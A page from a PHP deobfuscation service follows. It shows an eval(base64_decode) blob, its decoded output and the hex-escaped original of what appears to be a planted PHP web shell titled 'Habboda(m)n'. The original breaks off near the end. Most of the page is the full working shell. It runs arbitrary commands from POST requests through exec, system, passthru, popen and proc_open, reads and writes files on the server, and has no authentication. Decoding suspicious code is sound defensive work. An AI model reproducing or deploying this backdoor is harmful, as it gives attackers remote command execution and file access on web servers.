Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('CiBnb3RvIFNJTFdLOyBvRVZUMzogZnVuY3Rpb24gaW5pdFNoZWxsQ29uZmlnKCkg..

Decoded Output download


 goto SILWK; oEVT3: function initShellConfig() { global $SHELL_CONFIG; if (isRunningWindows()) { $username = getenv("USERNAME"); if ($username !== false) { $SHELL_CONFIG["username"] = $username; } } else { $pwuid = posix_getpwuid(posix_geteuid()); if ($pwuid !== false) { $SHELL_CONFIG["username"] = $pwuid["name"]; } } $hostname = gethostname(); if ($hostname !== false) { $SHELL_CONFIG["hostname"] = $hostname; } } goto tQ2_5; EZskR: function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array("stdout" => base64_encode("File not found / no read permission."), "cwd" => base64_encode(getcwd())); } else { return array("name" => base64_encode(basename($filePath)), "file" => base64_encode($file)); } } goto j6KGr; tOu44: function featurePwd() { return array("cwd" => base64_encode(getcwd())); } goto jGWVE; oYyIW: function allFunctionExist($list = array()) { foreach ($list as $entry) { if (!function_exists($entry)) { return false; } } return true; } goto ZMziK; exWpx: function featureShell($cmd, $cwd) { $stdout = ''; if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) { chdir(expandPath("~")); } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir(expandPath($match[1])); } elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); $stdout = executeCommand($cmd); } return array("stdout" => base64_encode($stdout), "cwd" => base64_encode(getcwd())); } goto tOu44; tQ2_5: if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST["cmd"]; if (!preg_match("/2>/", $cmd)) { $cmd .= " 2>&1"; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST["filename"], $_POST["cwd"], $_POST["type"]); break; case "upload": $response = featureUpload($_POST["path"], $_POST["file"], $_POST["cwd"]); } header("Content-Type: application/json"); echo json_encode($response); die; } else { initShellConfig(); } goto rwNLJ; rwNLJ: ?>
<!DOCTYPE html>

<html>

    <head>
        <meta charset="UTF-8" />
        <title>Habboda(m)n:~#</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <style>
            html, body {
                margin: 0;
                padding: 0;
                background: #333;
                color: #eee;
                font-family: monospace;
                width: 100vw;
                height: 100vh;
                overflow: hidden;
            }

            *::-webkit-scrollbar-track {
                border-radius: 8px;
                background-color: #353535;
            }

            *::-webkit-scrollbar {
                width: 8px;
                height: 8px;
            }

            *::-webkit-scrollbar-thumb {
                border-radius: 8px;
                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
                background-color: #bcbcbc;
            }

            #shell {
                background: #222;
                box-shadow: 0 0 5px rgba(0, 0, 0, .3);
                font-size: 10pt;
                display: flex;
                flex-direction: column;
                align-items: stretch;
                max-width: calc(100vw - 2 * var(--shell-margin));
                max-height: calc(100vh - 2 * var(--shell-margin));
                resize: both;
                overflow: hidden;
                width: 100%;
                height: 100%;
                margin: var(--shell-margin) auto;
            }

            #shell-content {
                overflow: auto;
                padding: 5px;
                white-space: pre-wrap;
                flex-grow: 1;
            }

            #shell-logo {
                font-weight: bold;
                color: #FF4180;
                text-align: center;
            }

            :root {
                --shell-margin: 25px;
            }

            @media (min-width: 1200px) {
                :root {
                    --shell-margin: 50px !important;
                }
            }

            @media (max-width: 991px),
                   (max-height: 600px) {
                #shell-logo {
                    font-size: 6px;
                    margin: -25px 0;
                }
                :root {
                    --shell-margin: 0 !important;
                }
                #shell {
                    resize: none;
                }
            }

            @media (max-width: 767px) {
                #shell-input {
                    flex-direction: column;
                }
            }

            @media (max-width: 320px) {
                #shell-logo {
                    font-size: 5px;
                }
            }

            .shell-prompt {
                font-weight: bold;
                color: #75DF0B;
            }

            .shell-prompt > span {
                color: #1BC9E7;
            }

            #shell-input {
                display: flex;
                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
                border-top: rgba(255, 255, 255, .05) solid 1px;
                padding: 10px 0;
            }

            #shell-input > label {
                flex-grow: 0;
                display: block;
                padding: 0 5px;
                height: 30px;
                line-height: 30px;
            }

            #shell-input #shell-cmd {
                height: 30px;
                line-height: 30px;
                border: none;
                background: transparent;
                color: #eee;
                font-family: monospace;
                font-size: 10pt;
                width: 100%;
                align-self: center;
                box-sizing: border-box;
            }

            #shell-input div {
                flex-grow: 1;
                align-items: stretch;
            }

            #shell-input input {
                outline: none;
            }
        </style>

        <script>
            var SHELL_CONFIG = <?php  goto HB3wY; j6KGr: function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, "wb"); if ($f === FALSE) { return array("stdout" => base64_encode("Invalid path / no write permission."), "cwd" => base64_encode(getcwd())); } else { fwrite($f, base64_decode($file)); fclose($f); return array("stdout" => base64_encode("Done."), "cwd" => base64_encode(getcwd())); } } goto oEVT3; e7tHV: function isRunningWindows() { return stripos(PHP_OS, "WIN") === 0; } goto exWpx; ZMziK: function executeCommand($cmd) { $output = ''; if (function_exists("exec")) { exec($cmd, $output); $output = implode("
", $output); } else { if (function_exists("shell_exec")) { $output = shell_exec($cmd); } else { if (allFunctionExist(array("system", "ob_start", "ob_get_contents", "ob_end_clean"))) { ob_start(); system($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("passthru", "ob_start", "ob_get_contents", "ob_end_clean"))) { ob_start(); passthru($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("popen", "feof", "fread", "pclose"))) { $handle = popen($cmd, "r"); while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } else { if (allFunctionExist(array("proc_open", "stream_get_contents", "proc_close"))) { $handle = proc_open($cmd, array(0 => array("pipe", "r"), 1 => array("pipe", "w")), $pipes); $output = stream_get_contents($pipes[1]); proc_close($handle); } } } } } } return $output; } goto e7tHV; SILWK: $SHELL_CONFIG = array("username" => "Controlsda", "hostname" => "localhost"); goto S1ggh; S1ggh: function expandPath($path) { if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) { exec("echo {$match["1"]}", $stdout); return $stdout[0] . $match[2]; } return $path; } goto oYyIW; jGWVE: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "cmd") { $cmd = "compgen -c {$fileName}"; } else { $cmd = "compgen -f {$fileName}"; } $cmd = "/bin/bash -c "{$cmd}""; $files = explode("
", shell_exec($cmd)); foreach ($files as &$filename) { $filename = base64_encode($filename); } return array("files" => $files); } goto EZskR; HB3wY: echo json_encode($SHELL_CONFIG); goto aRDKp; aRDKp: ?>
;
            var CWD = null;
            var commandHistory = [];
            var historyPosition = 0;
            var eShellCmdInput = null;
            var eShellContent = null;

            function _insertCommand(command) {
                eShellContent.innerHTML += "

";
                eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
                eShellContent.innerHTML += escapeHtml(command);
                eShellContent.innerHTML += "
";
                eShellContent.scrollTop = eShellContent.scrollHeight;
            }

            function _insertStdout(stdout) {
                eShellContent.innerHTML += escapeHtml(stdout);
                eShellContent.scrollTop = eShellContent.scrollHeight;
            }

            function _defer(callback) {
                setTimeout(callback, 0);
            }

            function featureShell(command) {

                _insertCommand(command);
                if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
                    featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
                } else if (/^\s*clear\s*$/.test(command)) {
                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
                    eShellContent.innerHTML = '';
                } else {
                    makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
                        if (response.hasOwnProperty('file')) {
                            featureDownload(atob(response.name), response.file)
                        } else {
                            _insertStdout(atob(response.stdout));
                            updateCwd(atob(response.cwd));
                        }
                    });
                }
            }

            function featureHint() {
                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete

                function _requestCallback(data) {
                    if (data.files.length <= 1) return;  // no completion
                    data.files = data.files.map(function(file){
                        return atob(file);
                    });
                    if (data.files.length === 2) {
                        if (type === 'cmd') {
                            eShellCmdInput.value = data.files[0];
                        } else {
                            var currentValue = eShellCmdInput.value;
                            eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
                        }
                    } else {
                        _insertCommand(eShellCmdInput.value);
                        _insertStdout(data.files.join("
"));
                    }
                }

                var currentCmd = eShellCmdInput.value.split(" ");
                var type = (currentCmd.length === 1) ? "cmd" : "file";
                var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];

                makeRequest(
                    "?feature=hint",
                    {
                        filename: fileName,
                        cwd: CWD,
                        type: type
                    },
                    _requestCallback
                );

            }

            function featureDownload(name, file) {
                var element = document.createElement('a');
                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
                element.setAttribute('download', name);
                element.style.display = 'none';
                document.body.appendChild(element);
                element.click();
                document.body.removeChild(element);
                _insertStdout('Done.');
            }

            function featureUpload(path) {
                var element = document.createElement('input');
                element.setAttribute('type', 'file');
                element.style.display = 'none';
                document.body.appendChild(element);
                element.addEventListener('change', function () {
                    var promise = getBase64(element.files[0]);
                    promise.then(function (file) {
                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
                            _insertStdout(atob(response.stdout));
                            updateCwd(atob(response.cwd));
                        });
                    }, function () {
                        _insertStdout('An unknown client-side error occurred.');
                    });
                });
                element.click();
                document.body.removeChild(element);
            }

            function getBase64(file, onLoadCallback) {
                return new Promise(function(resolve, reject) {
                    var reader = new FileReader();
                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
                    reader.onerror = reject;
                    reader.readAsDataURL(file);
                });
            }

            function genPrompt(cwd) {
                cwd = cwd || "~";
                var shortCwd = cwd;
                if (cwd.split("/").length > 3) {
                    var splittedCwd = cwd.split("/");
                    shortCwd = "/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
                }
                return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
            }

            function updateCwd(cwd) {
                if (cwd) {
                    CWD = cwd;
                    _updatePrompt();
                    return;
                }
                makeRequest("?feature=pwd", {}, function(response) {
                    CWD = atob(response.cwd);
                    _updatePrompt();
                });

            }

            function escapeHtml(string) {
                return string
                    .replace(/&/g, "&amp;")
                    .replace(/</g, "&lt;")
                    .replace(/>/g, "&gt;");
            }

            function _updatePrompt() {
                var eShellPrompt = document.getElementById("shell-prompt");
                eShellPrompt.innerHTML = genPrompt(CWD);
            }

            function _onShellCmdKeyDown(event) {
                switch (event.key) {
                    case "Enter":
                        featureShell(eShellCmdInput.value);
                        insertToHistory(eShellCmdInput.value);
                        eShellCmdInput.value = "";
                        break;
                    case "ArrowUp":
                        if (historyPosition > 0) {
                            historyPosition--;
                            eShellCmdInput.blur();
                            eShellCmdInput.value = commandHistory[historyPosition];
                            _defer(function() {
                                eShellCmdInput.focus();
                            });
                        }
                        break;
                    case "ArrowDown":
                        if (historyPosition >= commandHistory.length) {
                            break;
                        }
                        historyPosition++;
                        if (historyPosition === commandHistory.length) {
                            eShellCmdInput.value = "";
                        } else {
                            eShellCmdInput.blur();
                            eShellCmdInput.focus();
                            eShellCmdInput.value = commandHistory[historyPosition];
                        }
                        break;
                    case 'Tab':
                        event.preventDefault();
                        featureHint();
                        break;
                }
            }

            function insertToHistory(cmd) {
                commandHistory.push(cmd);
                historyPosition = commandHistory.length;
            }

            function makeRequest(url, params, callback) {
                function getQueryString() {
                    var a = [];
                    for (var key in params) {
                        if (params.hasOwnProperty(key)) {
                            a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
                        }
                    }
                    return a.join("&");
                }
                var xhr = new XMLHttpRequest();
                xhr.open("POST", url, true);
                xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                xhr.onreadystatechange = function() {
                    if (xhr.readyState === 4 && xhr.status === 200) {
                        try {
                            var responseJson = JSON.parse(xhr.responseText);
                            callback(responseJson);
                        } catch (error) {
                            alert("Error while parsing response: " + error);
                        }
                    }
                };
                xhr.send(getQueryString());
            }

            document.onclick = function(event) {
                event = event || window.event;
                var selection = window.getSelection();
                var target = event.target || event.srcElement;

                if (target.tagName === "SELECT") {
                    return;
                }

                if (!selection.toString()) {
                    eShellCmdInput.focus();
                }
            };

            window.onload = function() {
                eShellCmdInput = document.getElementById("shell-cmd");
                eShellContent = document.getElementById("shell-content");
                updateCwd();
                eShellCmdInput.focus();
            };
        </script>
    </head>

    <body>
        <div id="shell">
            <pre id="shell-content">
                <div id="shell-logo">
                <pre>
  _    _          ____  ____   ____  _____           __       __  _   _ 
 | |  | |   /\   |  _ \|  _ \ / __ \|  __ \   /\    / /       \ \| \ | |
 | |__| |  /  \  | |_) | |_) | |  | | |  | | /  \  | |_ __ ___ | |  \| |
 |  __  | / /\ \ |  _ <|  _ <| |  | | |  | |/ /\ \ | | '_ ` _ \| | . ` |
 | |  | |/ ____ \| |_) | |_) | |__| | |__| / ____ \| | | | | | | | |\  |
 |_|  |_/_/    \_\____/|____/ \____/|_____/_/    \_\ |_| |_| |_| |_| \_|
                                                    \_\       /_/       
                                                                                                 
</pre>
                </div>
            </pre>
            <div id="shell-input">
                <label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
                <div>
                    <input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
                </div>
            </div>
        </div>
    </body>

</htm

Did this file decode correctly?

Original Code

<?php eval(base64_decode('
 goto SILWK; oEVT3: function initShellConfig() { global $SHELL_CONFIG; if (isRunningWindows()) { $username = getenv("\125\123\x45\122\116\x41\x4d\105"); if ($username !== false) { $SHELL_CONFIG["\165\163\x65\x72\156\x61\x6d\145"] = $username; } } else { $pwuid = posix_getpwuid(posix_geteuid()); if ($pwuid !== false) { $SHELL_CONFIG["\165\163\145\162\156\x61\155\145"] = $pwuid["\156\x61\x6d\145"]; } } $hostname = gethostname(); if ($hostname !== false) { $SHELL_CONFIG["\150\157\x73\x74\x6e\x61\155\x65"] = $hostname; } } goto tQ2_5; EZskR: function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array("\163\x74\144\157\165\x74" => base64_encode("\106\x69\x6c\x65\x20\156\x6f\164\x20\x66\157\x75\x6e\x64\40\57\40\x6e\x6f\40\x72\145\x61\144\40\160\x65\162\155\151\x73\163\x69\157\x6e\x2e"), "\x63\x77\144" => base64_encode(getcwd())); } else { return array("\x6e\141\x6d\x65" => base64_encode(basename($filePath)), "\146\x69\x6c\145" => base64_encode($file)); } } goto j6KGr; tOu44: function featurePwd() { return array("\x63\167\144" => base64_encode(getcwd())); } goto jGWVE; oYyIW: function allFunctionExist($list = array()) { foreach ($list as $entry) { if (!function_exists($entry)) { return false; } } return true; } goto ZMziK; exWpx: function featureShell($cmd, $cwd) { $stdout = ''; if (preg_match("\x2f\136\134\163\x2a\x63\x64\134\x73\x2a\x28\62\x3e\x26\x31\51\x3f\44\x2f", $cmd)) { chdir(expandPath("\176")); } elseif (preg_match("\57\x5e\134\x73\52\143\144\x5c\163\x2b\50\56\53\x29\x5c\163\x2a\x28\x32\x3e\x26\x31\x29\x3f\44\x2f", $cmd)) { chdir($cwd); preg_match("\x2f\x5e\134\163\52\x63\144\x5c\163\53\50\133\x5e\x5c\x73\135\53\51\134\x73\x2a\50\x32\x3e\x26\61\51\77\44\x2f", $cmd, $match); chdir(expandPath($match[1])); } elseif (preg_match("\57\x5e\x5c\x73\52\144\x6f\x77\156\x6c\157\141\144\x5c\x73\x2b\x5b\136\134\163\135\x2b\134\163\52\50\62\76\46\61\x29\77\x24\x2f", $cmd)) { chdir($cwd); preg_match("\x2f\136\x5c\163\x2a\x64\x6f\x77\156\x6c\157\141\144\x5c\x73\x2b\50\x5b\136\x5c\x73\x5d\x2b\x29\134\163\52\x28\x32\76\46\x31\51\77\44\57", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); $stdout = executeCommand($cmd); } return array("\x73\x74\144\157\x75\164" => base64_encode($stdout), "\x63\167\x64" => base64_encode(getcwd())); } goto tOu44; tQ2_5: if (isset($_GET["\x66\x65\141\164\x75\162\145"])) { $response = NULL; switch ($_GET["\x66\145\x61\164\x75\x72\x65"]) { case "\163\150\x65\154\154": $cmd = $_POST["\x63\x6d\x64"]; if (!preg_match("\x2f\x32\76\x2f", $cmd)) { $cmd .= "\x20\x32\x3e\x26\61"; } $response = featureShell($cmd, $_POST["\143\x77\144"]); break; case "\160\x77\144": $response = featurePwd(); break; case "\x68\151\x6e\x74": $response = featureHint($_POST["\x66\151\154\x65\156\141\x6d\145"], $_POST["\x63\x77\144"], $_POST["\x74\x79\160\145"]); break; case "\x75\x70\154\157\141\x64": $response = featureUpload($_POST["\160\141\x74\150"], $_POST["\146\151\x6c\145"], $_POST["\x63\167\x64"]); } header("\x43\157\x6e\164\145\156\x74\55\x54\171\160\145\72\40\141\160\160\154\x69\x63\141\x74\151\x6f\x6e\57\x6a\163\x6f\x6e"); echo json_encode($response); die; } else { initShellConfig(); } goto rwNLJ; rwNLJ: ?>
<!DOCTYPE html>

<html>

    <head>
        <meta charset="UTF-8" />
        <title>Habboda(m)n:~#</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <style>
            html, body {
                margin: 0;
                padding: 0;
                background: #333;
                color: #eee;
                font-family: monospace;
                width: 100vw;
                height: 100vh;
                overflow: hidden;
            }

            *::-webkit-scrollbar-track {
                border-radius: 8px;
                background-color: #353535;
            }

            *::-webkit-scrollbar {
                width: 8px;
                height: 8px;
            }

            *::-webkit-scrollbar-thumb {
                border-radius: 8px;
                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
                background-color: #bcbcbc;
            }

            #shell {
                background: #222;
                box-shadow: 0 0 5px rgba(0, 0, 0, .3);
                font-size: 10pt;
                display: flex;
                flex-direction: column;
                align-items: stretch;
                max-width: calc(100vw - 2 * var(--shell-margin));
                max-height: calc(100vh - 2 * var(--shell-margin));
                resize: both;
                overflow: hidden;
                width: 100%;
                height: 100%;
                margin: var(--shell-margin) auto;
            }

            #shell-content {
                overflow: auto;
                padding: 5px;
                white-space: pre-wrap;
                flex-grow: 1;
            }

            #shell-logo {
                font-weight: bold;
                color: #FF4180;
                text-align: center;
            }

            :root {
                --shell-margin: 25px;
            }

            @media (min-width: 1200px) {
                :root {
                    --shell-margin: 50px !important;
                }
            }

            @media (max-width: 991px),
                   (max-height: 600px) {
                #shell-logo {
                    font-size: 6px;
                    margin: -25px 0;
                }
                :root {
                    --shell-margin: 0 !important;
                }
                #shell {
                    resize: none;
                }
            }

            @media (max-width: 767px) {
                #shell-input {
                    flex-direction: column;
                }
            }

            @media (max-width: 320px) {
                #shell-logo {
                    font-size: 5px;
                }
            }

            .shell-prompt {
                font-weight: bold;
                color: #75DF0B;
            }

            .shell-prompt > span {
                color: #1BC9E7;
            }

            #shell-input {
                display: flex;
                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
                border-top: rgba(255, 255, 255, .05) solid 1px;
                padding: 10px 0;
            }

            #shell-input > label {
                flex-grow: 0;
                display: block;
                padding: 0 5px;
                height: 30px;
                line-height: 30px;
            }

            #shell-input #shell-cmd {
                height: 30px;
                line-height: 30px;
                border: none;
                background: transparent;
                color: #eee;
                font-family: monospace;
                font-size: 10pt;
                width: 100%;
                align-self: center;
                box-sizing: border-box;
            }

            #shell-input div {
                flex-grow: 1;
                align-items: stretch;
            }

            #shell-input input {
                outline: none;
            }
        </style>

        <script>
            var SHELL_CONFIG = <?php  goto HB3wY; j6KGr: function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, "\x77\x62"); if ($f === FALSE) { return array("\163\x74\x64\x6f\x75\164" => base64_encode("\x49\156\166\141\x6c\x69\x64\40\x70\141\x74\x68\x20\57\x20\156\157\40\167\162\151\x74\145\40\160\145\162\x6d\151\x73\x73\x69\157\156\x2e"), "\x63\x77\x64" => base64_encode(getcwd())); } else { fwrite($f, base64_decode($file)); fclose($f); return array("\163\x74\144\157\x75\x74" => base64_encode("\104\x6f\156\x65\56"), "\143\167\144" => base64_encode(getcwd())); } } goto oEVT3; e7tHV: function isRunningWindows() { return stripos(PHP_OS, "\x57\x49\116") === 0; } goto exWpx; ZMziK: function executeCommand($cmd) { $output = ''; if (function_exists("\145\x78\145\x63")) { exec($cmd, $output); $output = implode("\12", $output); } else { if (function_exists("\x73\x68\x65\154\154\x5f\x65\170\x65\x63")) { $output = shell_exec($cmd); } else { if (allFunctionExist(array("\x73\171\163\x74\x65\155", "\x6f\142\137\163\x74\x61\162\164", "\x6f\x62\137\x67\145\164\137\143\x6f\156\x74\x65\x6e\164\x73", "\x6f\142\x5f\145\x6e\x64\137\143\x6c\x65\141\156"))) { ob_start(); system($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\160\x61\163\163\164\x68\x72\165", "\157\142\137\163\x74\x61\x72\164", "\157\142\x5f\147\145\x74\137\143\157\156\x74\x65\x6e\164\x73", "\157\142\x5f\145\x6e\144\137\143\154\x65\141\156"))) { ob_start(); passthru($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\160\157\x70\x65\156", "\146\145\x6f\x66", "\x66\x72\x65\x61\x64", "\x70\x63\x6c\157\163\145"))) { $handle = popen($cmd, "\x72"); while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } else { if (allFunctionExist(array("\x70\162\x6f\143\x5f\x6f\x70\x65\x6e", "\x73\x74\162\145\141\155\x5f\x67\145\164\137\x63\157\x6e\x74\x65\156\164\x73", "\x70\162\x6f\x63\x5f\143\154\x6f\163\x65"))) { $handle = proc_open($cmd, array(0 => array("\160\x69\160\145", "\x72"), 1 => array("\160\151\x70\145", "\167")), $pipes); $output = stream_get_contents($pipes[1]); proc_close($handle); } } } } } } return $output; } goto e7tHV; SILWK: $SHELL_CONFIG = array("\165\163\x65\x72\x6e\x61\x6d\x65" => "\x43\157\156\x74\162\157\x6c\x73\144\141", "\x68\157\163\164\x6e\x61\x6d\x65" => "\x6c\x6f\143\141\x6c\150\x6f\163\x74"); goto S1ggh; S1ggh: function expandPath($path) { if (preg_match("\43\x5e\x28\x7e\x5b\x61\x2d\x7a\x41\55\132\x30\x2d\71\137\x2e\x2d\x5d\x2a\x29\50\x2f\x2e\52\x29\77\x24\43", $path, $match)) { exec("\145\x63\x68\x6f\x20{$match["\61"]}", $stdout); return $stdout[0] . $match[2]; } return $path; } goto oYyIW; jGWVE: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "\x63\155\144") { $cmd = "\x63\x6f\155\160\147\145\x6e\x20\55\x63\40{$fileName}"; } else { $cmd = "\143\157\155\160\147\145\x6e\x20\x2d\146\x20{$fileName}"; } $cmd = "\x2f\142\151\x6e\x2f\x62\x61\x73\x68\40\55\143\x20\x22{$cmd}\x22"; $files = explode("\12", shell_exec($cmd)); foreach ($files as &$filename) { $filename = base64_encode($filename); } return array("\x66\x69\x6c\145\163" => $files); } goto EZskR; HB3wY: echo json_encode($SHELL_CONFIG); goto aRDKp; aRDKp: ?>
;
            var CWD = null;
            var commandHistory = [];
            var historyPosition = 0;
            var eShellCmdInput = null;
            var eShellContent = null;

            function _insertCommand(command) {
                eShellContent.innerHTML += "\n\n";
                eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
                eShellContent.innerHTML += escapeHtml(command);
                eShellContent.innerHTML += "\n";
                eShellContent.scrollTop = eShellContent.scrollHeight;
            }

            function _insertStdout(stdout) {
                eShellContent.innerHTML += escapeHtml(stdout);
                eShellContent.scrollTop = eShellContent.scrollHeight;
            }

            function _defer(callback) {
                setTimeout(callback, 0);
            }

            function featureShell(command) {

                _insertCommand(command);
                if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
                    featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
                } else if (/^\s*clear\s*$/.test(command)) {
                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
                    eShellContent.innerHTML = '';
                } else {
                    makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
                        if (response.hasOwnProperty('file')) {
                            featureDownload(atob(response.name), response.file)
                        } else {
                            _insertStdout(atob(response.stdout));
                            updateCwd(atob(response.cwd));
                        }
                    });
                }
            }

            function featureHint() {
                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete

                function _requestCallback(data) {
                    if (data.files.length <= 1) return;  // no completion
                    data.files = data.files.map(function(file){
                        return atob(file);
                    });
                    if (data.files.length === 2) {
                        if (type === 'cmd') {
                            eShellCmdInput.value = data.files[0];
                        } else {
                            var currentValue = eShellCmdInput.value;
                            eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
                        }
                    } else {
                        _insertCommand(eShellCmdInput.value);
                        _insertStdout(data.files.join("\n"));
                    }
                }

                var currentCmd = eShellCmdInput.value.split(" ");
                var type = (currentCmd.length === 1) ? "cmd" : "file";
                var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];

                makeRequest(
                    "?feature=hint",
                    {
                        filename: fileName,
                        cwd: CWD,
                        type: type
                    },
                    _requestCallback
                );

            }

            function featureDownload(name, file) {
                var element = document.createElement('a');
                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
                element.setAttribute('download', name);
                element.style.display = 'none';
                document.body.appendChild(element);
                element.click();
                document.body.removeChild(element);
                _insertStdout('Done.');
            }

            function featureUpload(path) {
                var element = document.createElement('input');
                element.setAttribute('type', 'file');
                element.style.display = 'none';
                document.body.appendChild(element);
                element.addEventListener('change', function () {
                    var promise = getBase64(element.files[0]);
                    promise.then(function (file) {
                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
                            _insertStdout(atob(response.stdout));
                            updateCwd(atob(response.cwd));
                        });
                    }, function () {
                        _insertStdout('An unknown client-side error occurred.');
                    });
                });
                element.click();
                document.body.removeChild(element);
            }

            function getBase64(file, onLoadCallback) {
                return new Promise(function(resolve, reject) {
                    var reader = new FileReader();
                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
                    reader.onerror = reject;
                    reader.readAsDataURL(file);
                });
            }

            function genPrompt(cwd) {
                cwd = cwd || "~";
                var shortCwd = cwd;
                if (cwd.split("/").length > 3) {
                    var splittedCwd = cwd.split("/");
                    shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
                }
                return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
            }

            function updateCwd(cwd) {
                if (cwd) {
                    CWD = cwd;
                    _updatePrompt();
                    return;
                }
                makeRequest("?feature=pwd", {}, function(response) {
                    CWD = atob(response.cwd);
                    _updatePrompt();
                });

            }

            function escapeHtml(string) {
                return string
                    .replace(/&/g, "&amp;")
                    .replace(/</g, "&lt;")
                    .replace(/>/g, "&gt;");
            }

            function _updatePrompt() {
                var eShellPrompt = document.getElementById("shell-prompt");
                eShellPrompt.innerHTML = genPrompt(CWD);
            }

            function _onShellCmdKeyDown(event) {
                switch (event.key) {
                    case "Enter":
                        featureShell(eShellCmdInput.value);
                        insertToHistory(eShellCmdInput.value);
                        eShellCmdInput.value = "";
                        break;
                    case "ArrowUp":
                        if (historyPosition > 0) {
                            historyPosition--;
                            eShellCmdInput.blur();
                            eShellCmdInput.value = commandHistory[historyPosition];
                            _defer(function() {
                                eShellCmdInput.focus();
                            });
                        }
                        break;
                    case "ArrowDown":
                        if (historyPosition >= commandHistory.length) {
                            break;
                        }
                        historyPosition++;
                        if (historyPosition === commandHistory.length) {
                            eShellCmdInput.value = "";
                        } else {
                            eShellCmdInput.blur();
                            eShellCmdInput.focus();
                            eShellCmdInput.value = commandHistory[historyPosition];
                        }
                        break;
                    case 'Tab':
                        event.preventDefault();
                        featureHint();
                        break;
                }
            }

            function insertToHistory(cmd) {
                commandHistory.push(cmd);
                historyPosition = commandHistory.length;
            }

            function makeRequest(url, params, callback) {
                function getQueryString() {
                    var a = [];
                    for (var key in params) {
                        if (params.hasOwnProperty(key)) {
                            a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
                        }
                    }
                    return a.join("&");
                }
                var xhr = new XMLHttpRequest();
                xhr.open("POST", url, true);
                xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                xhr.onreadystatechange = function() {
                    if (xhr.readyState === 4 && xhr.status === 200) {
                        try {
                            var responseJson = JSON.parse(xhr.responseText);
                            callback(responseJson);
                        } catch (error) {
                            alert("Error while parsing response: " + error);
                        }
                    }
                };
                xhr.send(getQueryString());
            }

            document.onclick = function(event) {
                event = event || window.event;
                var selection = window.getSelection();
                var target = event.target || event.srcElement;

                if (target.tagName === "SELECT") {
                    return;
                }

                if (!selection.toString()) {
                    eShellCmdInput.focus();
                }
            };

            window.onload = function() {
                eShellCmdInput = document.getElementById("shell-cmd");
                eShellContent = document.getElementById("shell-content");
                updateCwd();
                eShellCmdInput.focus();
            };
        </script>
    </head>

    <body>
        <div id="shell">
            <pre id="shell-content">
                <div id="shell-logo">
